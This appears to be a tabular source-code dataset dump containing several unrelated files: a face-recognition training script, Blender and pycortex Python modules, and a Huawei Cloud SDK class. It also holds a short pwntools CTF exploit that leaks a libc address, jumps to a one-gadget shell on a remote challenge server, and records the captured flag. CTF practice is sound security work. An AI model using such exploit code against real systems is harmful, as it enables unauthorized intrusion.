hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
sequencelengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
sequencelengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
sequencelengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 2
classes | is_sharp_comment_removed
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1c4a6340c5d62211f6a45bfb0967b64e8ecde7eb | 1,355 | py | Python | src/slim_train.py | limxuanyu127/seesawfacenet_pytorch | d975f12cb48b53508ca7ea42c5b0b459eb73a2bc | [
"MIT"
] | null | null | null | src/slim_train.py | limxuanyu127/seesawfacenet_pytorch | d975f12cb48b53508ca7ea42c5b0b459eb73a2bc | [
"MIT"
] | null | null | null | src/slim_train.py | limxuanyu127/seesawfacenet_pytorch | d975f12cb48b53508ca7ea42c5b0b459eb73a2bc | [
"MIT"
] | null | null | null | from config import get_config
from slim_Learner import face_learner
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='for face verification')
parser.add_argument("-e", "--epochs", help="training epochs", default=16, type=int)
parser.add_argument("-net", "--net_mode", help="which network, [ir, ir_se, mobilefacenet,seesawFaceNet]",default='seesawFaceNet', type=str)
parser.add_argument("-depth", "--net_depth", help="how many layers [50,100,152]", default=50, type=int)
parser.add_argument('-lr','--lr',help='learning rate',default=1e-1, type=float)
parser.add_argument("-b", "--batch_size", help="batch_size", default=196, type=int)
parser.add_argument("-w", "--num_workers", help="workers number", default=8, type=int)
parser.add_argument("-d", "--data_mode", help="use which database, [vgg, ms1m, emore, concat]",default='emore', type=str)
args = parser.parse_args()
conf = get_config()
if args.net_mode == 'seesawFaceNet':
conf.seesawFaceNet = True
else:
conf.net_mode = args.net_mode
conf.net_depth = args.net_depth
conf.lr = args.lr
conf.batch_size = args.batch_size
conf.num_workers = args.num_workers
conf.data_mode = args.data_mode
learner = face_learner(conf)
learner.train(conf, args.epochs)
| 43.709677 | 143 | 0.687823 | from config import get_config
from slim_Learner import face_learner
import argparse
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='for face verification')
parser.add_argument("-e", "--epochs", help="training epochs", default=16, type=int)
parser.add_argument("-net", "--net_mode", help="which network, [ir, ir_se, mobilefacenet,seesawFaceNet]",default='seesawFaceNet', type=str)
parser.add_argument("-depth", "--net_depth", help="how many layers [50,100,152]", default=50, type=int)
parser.add_argument('-lr','--lr',help='learning rate',default=1e-1, type=float)
parser.add_argument("-b", "--batch_size", help="batch_size", default=196, type=int)
parser.add_argument("-w", "--num_workers", help="workers number", default=8, type=int)
parser.add_argument("-d", "--data_mode", help="use which database, [vgg, ms1m, emore, concat]",default='emore', type=str)
args = parser.parse_args()
conf = get_config()
if args.net_mode == 'seesawFaceNet':
conf.seesawFaceNet = True
else:
conf.net_mode = args.net_mode
conf.net_depth = args.net_depth
conf.lr = args.lr
conf.batch_size = args.batch_size
conf.num_workers = args.num_workers
conf.data_mode = args.data_mode
learner = face_learner(conf)
learner.train(conf, args.epochs)
| true | true |
1c4a64081f8217ebdf60f72541839ad38a6f2848 | 890 | py | Python | release/scripts/modules/bl_keymap_utils/__init__.py | rbabari/blender | 6daa85f14b2974abfc3d0f654c5547f487bb3b74 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 365 | 2015-02-10T15:10:55.000Z | 2022-03-03T15:50:51.000Z | release/scripts/modules/bl_keymap_utils/__init__.py | rbabari/blender | 6daa85f14b2974abfc3d0f654c5547f487bb3b74 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 45 | 2015-01-09T15:34:20.000Z | 2021-10-05T14:44:23.000Z | release/scripts/modules/bl_keymap_utils/__init__.py | rbabari/blender | 6daa85f14b2974abfc3d0f654c5547f487bb3b74 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | 172 | 2015-01-25T15:16:53.000Z | 2022-01-31T08:25:36.000Z | # ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
__all__ = (
"io",
"keymap_from_toolbar",
"keymap_hierarchy",
)
| 34.230769 | 74 | 0.716854 |
__all__ = (
"io",
"keymap_from_toolbar",
"keymap_hierarchy",
)
| true | true |
1c4a65bb65df12ad239c522acfad3662a7231d1a | 15,278 | py | Python | cortex/dataset/views.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 423 | 2015-01-06T02:46:46.000Z | 2022-03-23T17:20:38.000Z | cortex/dataset/views.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 243 | 2015-01-03T02:10:03.000Z | 2022-03-31T19:29:48.000Z | cortex/dataset/views.py | mvdoc/pycortex | bc8a93cac9518e3c1cd89650c703f9f3814e805b | [
"BSD-2-Clause"
] | 136 | 2015-03-23T20:35:59.000Z | 2022-03-09T13:39:10.000Z | import json
import h5py
import numpy as np
from six import string_types
from .. import options
from .braindata import BrainData, VolumeData, VertexData
default_cmap = options.config.get("basic", "default_cmap")
def normalize(data):
if isinstance(data, tuple):
if len(data) == 3:
if data[0].dtype == np.uint8:
return VolumeRGB(data[0][...,0], data[0][...,1], data[0][...,2], *data[1:])
return Volume(*data)
elif len(data) == 2:
return Vertex(*data)
else:
raise TypeError("Invalid input for Dataview")
elif isinstance(data, Dataview):
return data
else:
raise TypeError("Invalid input for Dataview")
def _from_hdf_data(h5, name, xfmname=None, **kwargs):
"""Decodes a __hash named node from an HDF file into the
constituent Vertex or Volume object"""
dnode = h5.get("/data/%s"%name)
if dnode is None:
dnode = h5.get(name)
attrs = {k: u(v) for (k, v) in dnode.attrs.items()}
subj = attrs['subject']
#support old style xfmname saving as attribute
if xfmname is None and 'xfmname' in attrs:
xfmname = attrs['xfmname']
mask = None
if 'mask' in attrs:
if attrs['mask'].startswith("__"):
mask = h5['/subjects/%s/transforms/%s/masks/%s'%(attrs['subject'], xfmname, attrs['mask'])].value
else:
mask = attrs['mask']
#support old style RGB volumes
if dnode.dtype == np.uint8 and dnode.shape[-1] in (3, 4):
alpha = None
if dnode.shape[-1] == 4:
alpha = dnode[..., 3]
if xfmname is None:
return VertexRGB(dnode[...,0], dnode[...,1], dnode[...,2], subj,
alpha=alpha, **kwargs)
return VolumeRGB(dnode[...,0], dnode[...,1], dnode[...,2], subj, xfmname,
alpha=alpha, mask=mask, **kwargs)
if xfmname is None:
return Vertex(dnode, subj, **kwargs)
return Volume(dnode, subj, xfmname, mask=mask, **kwargs)
def _from_hdf_view(h5, data, xfmname=None, vmin=None, vmax=None, **kwargs):
if isinstance(data, string_types):
return _from_hdf_data(h5, data, xfmname=xfmname, vmin=vmin, vmax=vmax, **kwargs)
if len(data) == 2:
dim1 = _from_hdf_data(h5, data[0], xfmname=xfmname[0])
dim2 = _from_hdf_data(h5, data[1], xfmname=xfmname[1])
cls = Vertex2D if isinstance(dim1, Vertex) else Volume2D
return cls(dim1, dim2, vmin=vmin[0], vmin2=vmin[1],
vmax=vmax[0], vmax2=vmax[1], **kwargs)
elif len(data) == 4:
red, green, blue = [_from_hdf_data(h5, d, xfmname=xfmname) for d in data[:3]]
alpha = None
if data[3] is not None:
alpha = _from_hdf_data(h5, data[3], xfmname=xfmname)
cls = VertexRGB if isinstance(red, Vertex) else VolumeRGB
return cls(red, green, blue, alpha=alpha, **kwargs)
else:
raise ValueError("Invalid Dataview specification")
class Dataview(object):
def __init__(self, cmap=None, vmin=None, vmax=None, description="", state=None, **kwargs):
if self.__class__ == Dataview:
raise TypeError('Cannot directly instantiate Dataview objects')
self.cmap = cmap if cmap is not None else default_cmap
self.vmin = vmin
self.vmax = vmax
self.state = state
self.attrs = kwargs
if 'priority' not in self.attrs:
self.attrs['priority'] = 1
self.description = description
def copy(self, *args, **kwargs):
kwargs.update(self.attrs)
return self.__class__(*args,
cmap=self.cmap,
vmin=self.vmin,
vmax=self.vmax,
description=self.description,
state=self.state,
**kwargs)
@property
def priority(self):
return self.attrs['priority']
@priority.setter
def priority(self, value):
self.attrs['priority'] = value
def to_json(self, simple=False):
if simple:
return dict()
desc = self.description
if hasattr(desc, 'decode'):
desc = desc.decode()
sdict = dict(
state=self.state,
attrs=self.attrs.copy(),
desc=desc)
try:
sdict.update(dict(
cmap=[self.cmap],
vmin=[self.vmin if self.vmin is not None else np.percentile(np.nan_to_num(self.data), 1)],
vmax=[self.vmax if self.vmax is not None else np.percentile(np.nan_to_num(self.data), 99)]
))
except AttributeError:
pass
return sdict
@staticmethod
def from_hdf(node):
data = json.loads(u(node[0]))
desc = node[1]
try:
cmap = json.loads(u(node[2]))
except:
cmap = u(node[2])
vmin = json.loads(u(node[3]))
vmax = json.loads(u(node[4]))
state = json.loads(u(node[5]))
attrs = json.loads(u(node[6]))
try:
xfmname = json.loads(u(node[7]))
except ValueError:
xfmname = None
if not isinstance(vmin, list):
vmin = [vmin]
if not isinstance(vmax, list):
vmax = [vmax]
if not isinstance(cmap, list):
cmap = [cmap]
if len(data) == 1:
xfm = None if xfmname is None else xfmname[0]
return _from_hdf_view(node.file, data[0], xfmname=xfm, cmap=cmap[0], description=desc,
vmin=vmin[0], vmax=vmax[0], state=state, **attrs)
else:
views = [_from_hdf_view(node.file, d, xfmname=x) for d, x in zip(data, xfname)]
raise NotImplementedError
def _write_hdf(self, h5, name="data", data=None, xfmname=None):
views = h5.require_group("/views")
view = views.require_dataset(name, (8,), h5py.special_dtype(vlen=str))
view[0] = json.dumps(data)
view[1] = self.description
try:
view[2] = json.dumps([self.cmap])
view[3] = json.dumps([self.vmin])
view[4] = json.dumps([self.vmax])
except AttributeError:
#For VolumeRGB/Vertex, there is no cmap/vmin/vmax
view[2] = "null"
view[3:5] = "null"
view[5] = json.dumps(self.state)
view[6] = json.dumps(self.attrs)
view[7] = json.dumps(xfmname)
return view
@property
def raw(self):
from matplotlib import colors, cm, pyplot as plt
import glob, os
# Get colormap from matplotlib or pycortex colormaps
## -- redundant code, here and in cortex/quicklflat.py -- ##
if isinstance(self.cmap, string_types):
if not self.cmap in cm.__dict__:
# unknown colormap, test whether it's in pycortex colormaps
cmapdir = options.config.get('webgl', 'colormaps')
colormaps = glob.glob(os.path.join(cmapdir, "*.png"))
colormaps = dict(((os.path.split(c)[1][:-4],c) for c in colormaps))
if not self.cmap in colormaps:
raise Exception('Unkown color map!')
I = plt.imread(colormaps[self.cmap])
cmap = colors.ListedColormap(np.squeeze(I))
# Register colormap while we're at it
cm.register_cmap(self.cmap,cmap)
else:
cmap = cm.get_cmap(self.cmap)
elif isinstance(self.cmap, colors.Colormap):
cmap = self.cmap
# Normalize colors according to vmin, vmax
norm = colors.Normalize(self.vmin, self.vmax)
cmapper = cm.ScalarMappable(norm=norm, cmap=cmap)
color_data = cmapper.to_rgba(self.data.flatten()).reshape(self.data.shape+(4,))
# rollaxis puts the last color dimension first, to allow output of separate channels: r,g,b,a = dataset.raw
color_data = (np.clip(color_data, 0, 1) * 255).astype(np.uint8)
return np.rollaxis(color_data, -1)
class Multiview(Dataview):
def __init__(self, views, description=""):
for view in views:
if not isinstance(view, Dataview):
raise TypeError("Must be a View object!")
raise NotImplementedError
self.views = views
def uniques(self, collapse=False):
for view in self.views:
for sv in view.uniques(collapse=collapse):
yield sv
class Volume(VolumeData, Dataview):
"""
Encapsulates a 3D volume or 4D volumetric movie. Includes information on how
the volume should be colormapped for display purposes.
Parameters
----------
data : ndarray
The data. Can be 3D with shape (z,y,x), 1D with shape (v,) for masked data,
4D with shape (t,z,y,x), or 2D with shape (t,v). For masked data, if the
size of the given array matches any of the existing masks in the database,
that mask will automatically be loaded. If it does not, an error will be
raised.
subject : str
Subject identifier. Must exist in the pycortex database.
xfmname : str
Transform name. Must exist in the pycortex database.
mask : ndarray, optional
Binary 3D array with shape (z,y,x) showing which voxels are selected.
If masked data is given, the mask will automatically be loaded if it
exists in the pycortex database.
cmap : str or matplotlib colormap, optional
Colormap (or colormap name) to use. If not given defaults to matplotlib
default colormap.
vmin : float, optional
Minimum value in colormap. If not given, defaults to the 1st percentile
of the data.
vmax : float, optional
Maximum value in colormap. If not given defaults to the 99th percentile
of the data.
description : str, optional
String describing this dataset. Displayed in webgl viewer.
**kwargs
All additional arguments in kwargs are passed to the VolumeData and Dataview
"""
def __init__(self, data, subject, xfmname, mask=None,
cmap=None, vmin=None, vmax=None, description="", **kwargs):
super(Volume, self).__init__(data, subject, xfmname, mask=mask,
cmap=cmap, vmin=vmin, vmax=vmax,
description=description, **kwargs)
# set vmin and vmax
self.vmin = self.vmin if self.vmin is not None else \
np.percentile(np.nan_to_num(self.data), 1)
self.vmax = self.vmax if self.vmax is not None else \
np.percentile(np.nan_to_num(self.data), 99)
def _write_hdf(self, h5, name="data"):
datanode = VolumeData._write_hdf(self, h5)
viewnode = Dataview._write_hdf(self, h5, name=name,
data=[self.name],
xfmname=[self.xfmname])
return viewnode
@property
def raw(self):
r, g, b, a = super(Volume, self).raw
return VolumeRGB(r, g, b, self.subject, self.xfmname, a,
description=self.description, state=self.state,
**self.attrs)
class Vertex(VertexData, Dataview):
"""
Encapsulates a 1D vertex map or 2D vertex movie. Includes information on how
the data should be colormapped for display purposes.
Parameters
----------
data : ndarray
The data. Can be 1D with shape (v,), or 2D with shape (t,v). Here, v can
be the number of vertices in both hemispheres, or the number of vertices
in either one of the hemispheres. In that case, the data for the other
hemisphere will be filled with zeros.
subject : str
Subject identifier. Must exist in the pycortex database.
cmap : str or matplotlib colormap, optional
Colormap (or colormap name) to use. If not given defaults to matplotlib
default colormap.
vmin : float, optional
Minimum value in colormap. If not given, defaults to the 1st percentile
of the data.
vmax : float, optional
Maximum value in colormap. If not given defaults to the 99th percentile
of the data.
description : str, optional
String describing this dataset. Displayed in webgl viewer.
**kwargs
All additional arguments in kwargs are passed to the VolumeData and Dataview
"""
def __init__(self, data, subject, cmap=None, vmin=None, vmax=None, description="", **kwargs):
super(Vertex, self).__init__(data, subject, cmap=cmap, vmin=vmin, vmax=vmax,
description=description, **kwargs)
# set vmin and vmax
self.vmin = self.vmin if self.vmin is not None else \
np.percentile(np.nan_to_num(self.data), 1)
self.vmax = self.vmax if self.vmax is not None else \
np.percentile(np.nan_to_num(self.data), 99)
def _write_hdf(self, h5, name="data"):
datanode = VertexData._write_hdf(self, h5)
viewnode = Dataview._write_hdf(self, h5, name=name, data=[self.name])
return viewnode
@property
def raw(self):
r, g, b, a = super(Vertex, self).raw
return VertexRGB(r, g, b, self.subject, a,
description=self.description, state=self.state,
**self.attrs)
def map(self, target_subj, surface_type='fiducial',
hemi='both', fs_subj=None, **kwargs):
"""Map this data from this surface to another surface
Calls `cortex.freesurfer.vertex_to_vertex()` with this
vertex object as the first argument.
NOTE: Requires either previous computation of mapping matrices
(with `cortex.db.get_mri_surf2surf_matrix`) or active
freesurfer environment.
Parameters
----------
target_subj : str
freesurfer subject to which to map
Other Parameters
----------------
kwargs map to `cortex.freesurfer.vertex_to_vertex()`
"""
# Input check
if hemi not in ['lh', 'rh', 'both']:
raise ValueError("`hemi` kwarg must be 'lh', 'rh', or 'both'")
# lazy load
from ..database import db
mats = db.get_mri_surf2surf_matrix(self.subject, surface_type,
hemi='both', target_subj=target_subj, fs_subj=fs_subj,
**kwargs)
new_data = [mats[0].dot(self.left), mats[1].dot(self.right)]
if hemi == 'both':
new_data = np.hstack(new_data)
elif hemi == 'lh':
new_data = np.hstack([new_data[0], np.nan * np.zeros(new_data[1].shape)])
elif hemi == 'rh':
new_data = np.hstack([np.nan * np.zeros(new_data[0].shape), new_data[1]])
vx = Vertex(new_data, target_subj, vmin=self.vmin, vmax=self.vmax, cmap=self.cmap)
return vx
def u(s, encoding='utf8'):
try:
return s.decode(encoding)
except AttributeError:
return s
from .viewRGB import VolumeRGB, VertexRGB, Colors
from .view2D import Volume2D, Vertex2D
| 39.074169 | 115 | 0.582668 | import json
import h5py
import numpy as np
from six import string_types
from .. import options
from .braindata import BrainData, VolumeData, VertexData
default_cmap = options.config.get("basic", "default_cmap")
def normalize(data):
if isinstance(data, tuple):
if len(data) == 3:
if data[0].dtype == np.uint8:
return VolumeRGB(data[0][...,0], data[0][...,1], data[0][...,2], *data[1:])
return Volume(*data)
elif len(data) == 2:
return Vertex(*data)
else:
raise TypeError("Invalid input for Dataview")
elif isinstance(data, Dataview):
return data
else:
raise TypeError("Invalid input for Dataview")
def _from_hdf_data(h5, name, xfmname=None, **kwargs):
dnode = h5.get("/data/%s"%name)
if dnode is None:
dnode = h5.get(name)
attrs = {k: u(v) for (k, v) in dnode.attrs.items()}
subj = attrs['subject']
if xfmname is None and 'xfmname' in attrs:
xfmname = attrs['xfmname']
mask = None
if 'mask' in attrs:
if attrs['mask'].startswith("__"):
mask = h5['/subjects/%s/transforms/%s/masks/%s'%(attrs['subject'], xfmname, attrs['mask'])].value
else:
mask = attrs['mask']
if dnode.dtype == np.uint8 and dnode.shape[-1] in (3, 4):
alpha = None
if dnode.shape[-1] == 4:
alpha = dnode[..., 3]
if xfmname is None:
return VertexRGB(dnode[...,0], dnode[...,1], dnode[...,2], subj,
alpha=alpha, **kwargs)
return VolumeRGB(dnode[...,0], dnode[...,1], dnode[...,2], subj, xfmname,
alpha=alpha, mask=mask, **kwargs)
if xfmname is None:
return Vertex(dnode, subj, **kwargs)
return Volume(dnode, subj, xfmname, mask=mask, **kwargs)
def _from_hdf_view(h5, data, xfmname=None, vmin=None, vmax=None, **kwargs):
if isinstance(data, string_types):
return _from_hdf_data(h5, data, xfmname=xfmname, vmin=vmin, vmax=vmax, **kwargs)
if len(data) == 2:
dim1 = _from_hdf_data(h5, data[0], xfmname=xfmname[0])
dim2 = _from_hdf_data(h5, data[1], xfmname=xfmname[1])
cls = Vertex2D if isinstance(dim1, Vertex) else Volume2D
return cls(dim1, dim2, vmin=vmin[0], vmin2=vmin[1],
vmax=vmax[0], vmax2=vmax[1], **kwargs)
elif len(data) == 4:
red, green, blue = [_from_hdf_data(h5, d, xfmname=xfmname) for d in data[:3]]
alpha = None
if data[3] is not None:
alpha = _from_hdf_data(h5, data[3], xfmname=xfmname)
cls = VertexRGB if isinstance(red, Vertex) else VolumeRGB
return cls(red, green, blue, alpha=alpha, **kwargs)
else:
raise ValueError("Invalid Dataview specification")
class Dataview(object):
def __init__(self, cmap=None, vmin=None, vmax=None, description="", state=None, **kwargs):
if self.__class__ == Dataview:
raise TypeError('Cannot directly instantiate Dataview objects')
self.cmap = cmap if cmap is not None else default_cmap
self.vmin = vmin
self.vmax = vmax
self.state = state
self.attrs = kwargs
if 'priority' not in self.attrs:
self.attrs['priority'] = 1
self.description = description
def copy(self, *args, **kwargs):
kwargs.update(self.attrs)
return self.__class__(*args,
cmap=self.cmap,
vmin=self.vmin,
vmax=self.vmax,
description=self.description,
state=self.state,
**kwargs)
@property
def priority(self):
return self.attrs['priority']
@priority.setter
def priority(self, value):
self.attrs['priority'] = value
def to_json(self, simple=False):
if simple:
return dict()
desc = self.description
if hasattr(desc, 'decode'):
desc = desc.decode()
sdict = dict(
state=self.state,
attrs=self.attrs.copy(),
desc=desc)
try:
sdict.update(dict(
cmap=[self.cmap],
vmin=[self.vmin if self.vmin is not None else np.percentile(np.nan_to_num(self.data), 1)],
vmax=[self.vmax if self.vmax is not None else np.percentile(np.nan_to_num(self.data), 99)]
))
except AttributeError:
pass
return sdict
@staticmethod
def from_hdf(node):
data = json.loads(u(node[0]))
desc = node[1]
try:
cmap = json.loads(u(node[2]))
except:
cmap = u(node[2])
vmin = json.loads(u(node[3]))
vmax = json.loads(u(node[4]))
state = json.loads(u(node[5]))
attrs = json.loads(u(node[6]))
try:
xfmname = json.loads(u(node[7]))
except ValueError:
xfmname = None
if not isinstance(vmin, list):
vmin = [vmin]
if not isinstance(vmax, list):
vmax = [vmax]
if not isinstance(cmap, list):
cmap = [cmap]
if len(data) == 1:
xfm = None if xfmname is None else xfmname[0]
return _from_hdf_view(node.file, data[0], xfmname=xfm, cmap=cmap[0], description=desc,
vmin=vmin[0], vmax=vmax[0], state=state, **attrs)
else:
views = [_from_hdf_view(node.file, d, xfmname=x) for d, x in zip(data, xfname)]
raise NotImplementedError
def _write_hdf(self, h5, name="data", data=None, xfmname=None):
views = h5.require_group("/views")
view = views.require_dataset(name, (8,), h5py.special_dtype(vlen=str))
view[0] = json.dumps(data)
view[1] = self.description
try:
view[2] = json.dumps([self.cmap])
view[3] = json.dumps([self.vmin])
view[4] = json.dumps([self.vmax])
except AttributeError:
view[2] = "null"
view[3:5] = "null"
view[5] = json.dumps(self.state)
view[6] = json.dumps(self.attrs)
view[7] = json.dumps(xfmname)
return view
@property
def raw(self):
from matplotlib import colors, cm, pyplot as plt
import glob, os
if isinstance(self.cmap, string_types):
if not self.cmap in cm.__dict__:
cmapdir = options.config.get('webgl', 'colormaps')
colormaps = glob.glob(os.path.join(cmapdir, "*.png"))
colormaps = dict(((os.path.split(c)[1][:-4],c) for c in colormaps))
if not self.cmap in colormaps:
raise Exception('Unkown color map!')
I = plt.imread(colormaps[self.cmap])
cmap = colors.ListedColormap(np.squeeze(I))
# Register colormap while we're at it
cm.register_cmap(self.cmap,cmap)
else:
cmap = cm.get_cmap(self.cmap)
elif isinstance(self.cmap, colors.Colormap):
cmap = self.cmap
norm = colors.Normalize(self.vmin, self.vmax)
cmapper = cm.ScalarMappable(norm=norm, cmap=cmap)
color_data = cmapper.to_rgba(self.data.flatten()).reshape(self.data.shape+(4,))
color_data = (np.clip(color_data, 0, 1) * 255).astype(np.uint8)
return np.rollaxis(color_data, -1)
class Multiview(Dataview):
def __init__(self, views, description=""):
for view in views:
if not isinstance(view, Dataview):
raise TypeError("Must be a View object!")
raise NotImplementedError
self.views = views
def uniques(self, collapse=False):
for view in self.views:
for sv in view.uniques(collapse=collapse):
yield sv
class Volume(VolumeData, Dataview):
def __init__(self, data, subject, xfmname, mask=None,
cmap=None, vmin=None, vmax=None, description="", **kwargs):
super(Volume, self).__init__(data, subject, xfmname, mask=mask,
cmap=cmap, vmin=vmin, vmax=vmax,
description=description, **kwargs)
self.vmin = self.vmin if self.vmin is not None else \
np.percentile(np.nan_to_num(self.data), 1)
self.vmax = self.vmax if self.vmax is not None else \
np.percentile(np.nan_to_num(self.data), 99)
def _write_hdf(self, h5, name="data"):
datanode = VolumeData._write_hdf(self, h5)
viewnode = Dataview._write_hdf(self, h5, name=name,
data=[self.name],
xfmname=[self.xfmname])
return viewnode
@property
def raw(self):
r, g, b, a = super(Volume, self).raw
return VolumeRGB(r, g, b, self.subject, self.xfmname, a,
description=self.description, state=self.state,
**self.attrs)
class Vertex(VertexData, Dataview):
def __init__(self, data, subject, cmap=None, vmin=None, vmax=None, description="", **kwargs):
super(Vertex, self).__init__(data, subject, cmap=cmap, vmin=vmin, vmax=vmax,
description=description, **kwargs)
self.vmin = self.vmin if self.vmin is not None else \
np.percentile(np.nan_to_num(self.data), 1)
self.vmax = self.vmax if self.vmax is not None else \
np.percentile(np.nan_to_num(self.data), 99)
def _write_hdf(self, h5, name="data"):
datanode = VertexData._write_hdf(self, h5)
viewnode = Dataview._write_hdf(self, h5, name=name, data=[self.name])
return viewnode
@property
def raw(self):
r, g, b, a = super(Vertex, self).raw
return VertexRGB(r, g, b, self.subject, a,
description=self.description, state=self.state,
**self.attrs)
def map(self, target_subj, surface_type='fiducial',
hemi='both', fs_subj=None, **kwargs):
if hemi not in ['lh', 'rh', 'both']:
raise ValueError("`hemi` kwarg must be 'lh', 'rh', or 'both'")
from ..database import db
mats = db.get_mri_surf2surf_matrix(self.subject, surface_type,
hemi='both', target_subj=target_subj, fs_subj=fs_subj,
**kwargs)
new_data = [mats[0].dot(self.left), mats[1].dot(self.right)]
if hemi == 'both':
new_data = np.hstack(new_data)
elif hemi == 'lh':
new_data = np.hstack([new_data[0], np.nan * np.zeros(new_data[1].shape)])
elif hemi == 'rh':
new_data = np.hstack([np.nan * np.zeros(new_data[0].shape), new_data[1]])
vx = Vertex(new_data, target_subj, vmin=self.vmin, vmax=self.vmax, cmap=self.cmap)
return vx
def u(s, encoding='utf8'):
try:
return s.decode(encoding)
except AttributeError:
return s
from .viewRGB import VolumeRGB, VertexRGB, Colors
from .view2D import Volume2D, Vertex2D
| true | true |
1c4a676f27ed3a73245add251cc9aa1a30f369df | 374 | py | Python | _ctfs/wargamesmy-19/babypwn/xpl.py | daniellimws/daniellimws.github.io | 464548e058ca423548cbe95c4ee38f856f9185c2 | [
"MIT"
] | 1 | 2019-01-31T16:50:12.000Z | 2019-01-31T16:50:12.000Z | _ctfs/wargamesmy-19/babypwn/xpl.py | daniellimws/daniellimws.github.io | 464548e058ca423548cbe95c4ee38f856f9185c2 | [
"MIT"
] | null | null | null | _ctfs/wargamesmy-19/babypwn/xpl.py | daniellimws/daniellimws.github.io | 464548e058ca423548cbe95c4ee38f856f9185c2 | [
"MIT"
] | 3 | 2019-03-04T12:46:18.000Z | 2021-05-18T16:10:44.000Z | from pwn import *
# r = process("./babypwn")
r = remote("45.76.161.20", 19509)
leak = u32(r.recv(4))
libc_base = leak - 0xd80 - 0x1d8000
log.info("Leaked: " + hex(libc_base))
sh = libc_base + 0x3d0d5
log.info("Shell: " + hex(sh))
sh = -(2**32 - sh) if sh > 0x7fffffff else sh
# pause()
r.sendline(str(sh))
# pause()
r.interactive()
# wgmy{b20208102bc4242bb10197edec8f3bb9} | 23.375 | 45 | 0.660428 | from pwn import *
r = remote("45.76.161.20", 19509)
leak = u32(r.recv(4))
libc_base = leak - 0xd80 - 0x1d8000
log.info("Leaked: " + hex(libc_base))
sh = libc_base + 0x3d0d5
log.info("Shell: " + hex(sh))
sh = -(2**32 - sh) if sh > 0x7fffffff else sh
r.sendline(str(sh))
r.interactive()
| true | true |
1c4a6843d62ed680a7b0c55c9e80f25fddaa013a | 47 | py | Python | Taekwon/Python/baseGrammar/codeup040.py | sonnysorry/codingtest | 478e0168e3209eb97b6b16910027bf12ccc3ccd0 | [
"MIT"
] | 2 | 2021-09-27T19:10:36.000Z | 2021-11-09T05:40:39.000Z | Taekwon/Python/baseGrammar/codeup040.py | sonnysorry/codingtest | 478e0168e3209eb97b6b16910027bf12ccc3ccd0 | [
"MIT"
] | 1 | 2021-11-15T14:56:54.000Z | 2021-11-15T14:56:54.000Z | Taekwon/Python/baseGrammar/codeup040.py | sonnysorry/codingtest | 478e0168e3209eb97b6b16910027bf12ccc3ccd0 | [
"MIT"
] | null | null | null | a, b = input().split()
print(int(a) // int(b))
| 15.666667 | 23 | 0.531915 | a, b = input().split()
print(int(a) // int(b))
| true | true |
1c4a6896ce6f6954c7f299bc77e2b3cfe6d96de7 | 2,983 | py | Python | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/untag_device_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 64 | 2020-06-12T07:05:07.000Z | 2022-03-30T03:32:50.000Z | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/untag_device_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 11 | 2020-07-06T07:56:54.000Z | 2022-01-11T11:14:40.000Z | huaweicloud-sdk-iotda/huaweicloudsdkiotda/v5/model/untag_device_response.py | huaweicloud/huaweicloud-sdk-python-v3 | 7a6270390fcbf192b3882bf763e7016e6026ef78 | [
"Apache-2.0"
] | 24 | 2020-06-08T11:42:13.000Z | 2022-03-04T06:44:08.000Z | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class UntagDeviceResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'body': 'str'
}
attribute_map = {
'body': 'body'
}
def __init__(self, body=None):
"""UntagDeviceResponse - a model defined in huaweicloud sdk"""
